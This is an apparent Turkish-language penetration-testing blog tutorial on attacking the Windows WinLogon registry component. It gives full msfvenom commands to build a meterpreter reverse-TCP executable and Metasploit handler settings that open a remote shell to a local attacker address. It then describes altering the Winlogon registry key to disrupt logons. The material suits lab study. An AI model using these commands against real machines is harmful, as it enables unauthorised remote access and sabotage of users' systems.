Kaan Kozan tarafından 12 Ocak 2021 tarihinde yazılmıştır.
Merhabalar, bugün sizlere Windows işletim sistemlerinde Windows Logon'un çalıştırılmasını sağlayan Oturum Açma ile birçok kritik kontrolü gerçekleştiren WinLogon bileşeninin istismar edilmesini anlatacağım.
Yazıda Geçen İçerik Tablosu
- WinLogon'un Sistemlerde Kullanılmasındaki Etkenler
- İşletim Sistemlerinde Ağ Bileşenlerinin Kimliklerinin Belirlenmesi
- Reverse_TCP Dosyasının Oluşturularak Kullanılması
- Hedef Sistem Üzerinde Sızma Testleri
- Sızma Sonrası WinLogon Üzerinde Yapılabilecekler
WinLogon'un Sistemlerde Kullanılmasındaki Etkenler
Windows işletim sistemlerinde Default Registry Key değerlerinden biri olan, oturum açma aşamasında kimlik doğrulama görevi gören WinLogon bileşeni HKEY_LOCAL_MACHINE içerisinde yer alan bir değerdir.
İşletim Sistemlerinde Ağ Bileşenlerinin Kimliklerinin Belirlenmesi
Yazıda kullanacağımız Linux ve Windows işletim sistemlerinin İP Adresleri, Local Değerleri gibi bileşenler exploit aşamasında kullanılmak üzere öğrenilmelidir.
Bunun için Linux sistem üzerinde;
- ifconfig
Windows sistem üzerinde ise;
- ipconfig
Değerleri terminale yazıldığında aşağıdaki Local değerleri keşfedebiliyoruz.
Linux için; 192.168.1.39 (40)
Windows için; 192.168.1.38
Reverse_TCP Dosyasının Oluşturularak Kullanılması
Ağ keşfinin ardından artık msfvenom kullanılarak Reverse_TCP dosyasının oluşturulmasına geçilebilir. Ben sızma işlemi için msfvenom kullanacağım. Siz kendiniz de farklı yöntemler ile exploit edebilirsiniz.
İlk olarak msfvenom yazarak aracın sistem üzerinde arayüzüne erişebiliriz.
Daha sonrasında kullanacağımız payload'ı seçebiliriz. Burada windows/meterpreter/reverse_tcp payload'ını kullanabiliriz.
Ben örnek amacıyla resimlerde php versiyonları kullandım. Fakat siz Windows Payloadlar'ı kullanmalısınız.
Bunun ardından elde ettiğimiz ağ bilgileri ile aşağıdaki komut betiği yardımıyla bir dosya oluşturabiliriz.
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.39 lport=4444 -f exe > / root/Desktop/reverse_tcp.exe |
Bu aşamadan sonra hedef makinede exploit işlemi için oluşturulan dosyanın çalıştırılması gereklidir. Oluşturduğumuz dosya görseldeki şekildedir.
Hedef Sistem Üzerinde Sızma Testleri
Artık Metasploitable aracı açılarak exploit işlemlerine başlanılabilir. Bunun için ilk olarak msfconsole aracına erişimimizden sonra ''use exploit/multi/handler'' komutu kullanılabilir.
Ardından Local Host, Local Port gibi değerler belirlenerek hedef makine exploit edilebilir.
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.40
msf exploit(handler) > set lport 4444
msf exploit(handler) > exploit
Son işlem olarak, açılan sessions'a bağlanarak upload ve shell işlemleri ile değerlerde oynama yapılabilir.
Evet, ardından aşağıdaki gibi WinLogon'a erişilerek hedef sistemde Registry Key'lerde oturum aşma işlemlerinde değişiklikler yapılabilir, oturum açma işlemleri sekteye uğratılabilir.
Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
Anlatacaklarım buraya kadardı, okuduğunuz için teşekkürler. Esenlikler diliyorum.